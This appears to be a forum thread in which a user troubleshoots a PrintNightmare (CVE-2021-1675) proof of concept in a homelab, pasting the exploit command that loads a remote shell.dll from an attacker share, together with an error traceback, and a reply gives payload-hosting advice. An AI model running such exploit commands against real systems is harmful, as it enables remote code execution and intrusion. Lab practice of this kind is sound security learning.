DCERPCSessionError: and RPRN SessionError:

[RunRenegade]

Hi,

Attempting to run this PoC within my homelab and running into a few issues. Looked online and saw adding -smb2support might work, but it didn't change anything.

Running the following code;
sudo python3 CVE-2021-1675.py MARVEL.local/fcastle:Password1@192.168.71.154 '\\192.168.71.151\share\shell.dll'

Getting the following output;

[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_ec1e73781eaf7fda\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.71.151\share\shell.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/kali/Documents/PJPT/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/kali/Documents/PJPT/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
           ^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.11.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180

As a note, I am actually running this against workstations, not a DC. However, the pre-check flagged for the homelab host machines.

Any help appreciated, thanks.

[MiMaz7707]

Use smb instead of smbserver.py

but it will not return a shell